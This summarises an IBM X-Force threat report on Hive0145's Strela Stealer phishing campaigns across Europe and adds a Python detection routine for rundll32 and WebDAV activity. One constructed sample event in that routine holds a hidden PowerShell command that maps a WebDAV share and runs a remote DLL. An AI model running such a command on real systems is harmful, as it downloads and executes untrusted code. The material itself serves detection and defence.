Hive0145 Ramps up Strela Stealer Attacks Across Europe to Steal Email Credentials

IBM X‑Force tracks Hive0145 delivering Strela Stealer across Europe using invoice-themed phishing that now leverages previously stolen real emails to increase credibility. The campaign uses advanced delivery and obfuscation techniques (attachment hijacking, polyglots, signed binaries, WebDAV-hosted crypted DLLs) to harvest Outlook and Thunderbird credentials. #StrelaStealer #Hive0145

Keypoints

  • Hive0145 is a financially motivated initial access broker active since late 2022, focused on harvesting email credentials from Outlook and Thunderbird.
  • Campaigns use invoice-themed phishing and, since July 2024, weaponized genuinely stolen emails to send malicious attachments (attachment hijacking).
  • Delivery techniques include polyglot files, signed binaries, encrypted ZIPs, obfuscated scripts, and WebDAV-hosted crypted DLLs via a crypter called “Stellar Crypter” and loader “Stellar Loader.”
  • Strela Stealer exfiltrates credentials and system/app inventory via POST requests to hardcoded C2 servers and supports language checks to target specific keyboard locales.
  • Targeting expanded to include Ukraine in late 2024, with consistent focus on Spanish, German, Italian, Catalan, Basque and Polish victims.
  • Operators have adopted automation and higher-volume, weekday-focused campaigns—X‑Force observed weekly campaigns and large-scale activity in late 2024.
  • X‑Force recommends caution with ZIP attachments, monitoring rundll32.exe activity, using endpoint security, and educating staff to reduce risk.

MITRE Techniques

  • [T1566.001] Spearphishing Attachment – Used to deliver invoices and archive attachments that contain obfuscated scripts or executables (‘the victim receives an archive containing a heavily obfuscated JavaScript file that downloads and executes a crypted Strela Stealer DLL’).
  • [T1566] Phishing – Core initial access vector: invoice-themed emails masquerading as legitimate communications (‘the phishing emails used in these campaigns are real invoice notifications, which have been stolen through previously exfiltrated email credentials’).
  • [T1105] Ingress Tool Transfer – Malware and crypted DLLs are hosted on WebDAV staging servers and downloaded to victims (‘run a PowerShell command to connect to a WebDAV server and download and execute a crypted DLL’).
  • [T1059.001] Command and Scripting Interpreter: PowerShell – Obfuscated scripts run PowerShell to fetch and execute payloads from remote servers (‘rely on these obfuscated scripts to run a PowerShell command to connect to a WebDAV server and download and execute a crypted DLL’).
  • [T1027] Obfuscated Files or Information – Stellar Loader and other components employ heavy obfuscation and control-flow tricks to hinder analysis (‘Stellar samples are usually highly obfuscated and make use of techniques such as control flow obfuscation’).
  • [T1555] Credentials from Password Stores – Strela Stealer extracts stored email credentials from Outlook and Thunderbird registry/keys and uses CryptUnprotectData() to decrypt them (‘Strela Stealer is designed to extract user credentials stored in Microsoft Outlook and Mozilla Thunderbird’).
  • [T1078] Valid Accounts – Stolen, authentic emails and accounts are reused to send follow-on phishing and increase legitimacy (‘began using stolen emails to further spread Strela Stealer’).
  • [T1055] Process Injection – Stellar Loader maps and executes PE payloads in memory after decryption using VirtualAlloc and manual PE loading steps (‘Once the payload and API list have been decrypted, Stellar allocates space in memory using VirtualAlloc and maps the payload PE at the allocated address’).
  • [T1041] Exfiltration Over C2 Channel – Stolen credentials and system/app lists are encrypted and POSTed to hardcoded C2 endpoints (‘Then, Strela Stealer sends a POST request for each email client to its hardcoded C2 server:’).
  • [T1036] Masquerading – Filenames and email content are tailored to mimic legitimate organizations and invoices to evade suspicion (‘filenames to include targeted domain names… often identical to the name of the organization or company’).

Indicators of Compromise

  • [File extensions / names] Delivery artifacts and executable naming – uncommon PE extensions .com and .pif used for executables, and attachment names matching organization names (e.g., “Factura” themed filenames).
  • [File types] Malicious payload/container examples – encrypted ZIP archives with varying passwords; heavily obfuscated JavaScript files that download crypted DLLs.
  • [Certificates] Signed binaries context – valid code signing certificates observed (example: certificate issued to “Tecfinance Informatica E Projetos De Sistemas Ltda”), later revoked.
  • [C2 / Responses] Command-and-control indicators – Strela POST responses include strings such as “KH” (2023), “ANTIROK” (2024) and “CHOLLIMA” (Nov. 2024).
  • [Hosting] Staging servers context – WebDAV-hosted DLLs used to serve many Stellar Loader/crypted samples; the full report lists numerous DLL hashes, which are omitted here.

————
Hive0145 has steadily evolved Strela Stealer campaigns from simple invoice lures into sophisticated attachment‑hijacking operations that weaponize legitimately stolen emails. Victims across Spain, Germany, Italy and, more recently, Ukraine receive encrypted ZIPs or obfuscated script attachments that download a crypter/loader chain (Stellar Crypter → Stellar Loader) which decrypts and runs the Strela Stealer payload in memory to harvest Outlook and Thunderbird credentials.

The group uses multiple evasion tactics—polyglot files, valid code signing certificates, uncommon executable extensions (.com/.pif), heavy obfuscation and language checks—to target specific keyboard locales and avoid sandboxing. Stolen email accounts are repurposed to send authentic-looking invoice messages (attachment hijacking), increasing click-through and infection rates. X‑Force observed increased automation and weekday-focused, high-volume campaigns in late 2024 and recommends stricter handling of archive attachments, monitoring rundll32.exe activity, configuring endpoint defenses, and user awareness training.
————
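As an added example (not code from the X‑Force report or its authors): a small triage routine run over constructed process-creation events, implementing the rundll32.exe monitoring recommendation above and the script-to-PowerShell-to-WebDAV chain described under T1105 and T1059.001. The hosts, paths, file names and rule names are assumptions constructed for the example, not indicators from the report.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style fields).
# Hosts, paths and DLL names are invented for this example, not indicators from the report.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'powershell -w hidden "net use \\203.0.113.5@SSL\DavWWWRoot; rundll32 \\203.0.113.5@SSL\DavWWWRoot\inv.dll,Entry"'},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"rundll32.exe \\203.0.113.5@SSL\DavWWWRoot\inv.dll,Entry"},
    {"Image": r"C:\Windows\System32\rundll32.exe",          # benign control-panel launch
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

UNC_PATH = re.compile(r"\\\\[^\\\s]+\\")           # \\host\... (covers the host@SSL WebDAV form)
WEBDAV_MARK = re.compile(r"DavWWWRoot|@SSL|webdav", re.I)
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def triage_event(ev):
    """Return the list of rule names the event matches (empty list = nothing suspicious)."""
    hits = []
    image, parent, cmd = basename(ev["Image"]), basename(ev["ParentImage"]), ev["CommandLine"]
    # R1: rundll32 loading a DLL from a network (UNC/WebDAV) path instead of local disk.
    if image == "rundll32.exe" and UNC_PATH.search(cmd):
        hits.append("rundll32_remote_dll")
    # R2: an interpreter whose command line references WebDAV markers (payload fetch stage).
    if image in ("powershell.exe", "cmd.exe") and WEBDAV_MARK.search(cmd):
        hits.append("interpreter_webdav_fetch")
    # R3: interpreter or rundll32 spawned by a script host (attachment-launched chain).
    if image in ("powershell.exe", "rundll32.exe") and parent in SCRIPT_HOSTS:
        hits.append("script_host_spawn")
    return hits

def triage(events):
    """Return (index, matched_rules) for every event that matched at least one rule."""
    flagged = []
    for i, ev in enumerate(events):
        hits = triage_event(ev)
        if hits:
            flagged.append((i, hits))
    return flagged

if __name__ == "__main__":
    for idx, rules in triage(SAMPLE_EVENTS):
        print(idx, rules)
```

Rule R1 alone will also fire on legitimate DLLs loaded from file shares, so tune it to your environment's known UNC paths before alerting on it.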

Read more: https://securityintelligence.com/x-force/strela-stealer-todays-invoice-tomorrows-phish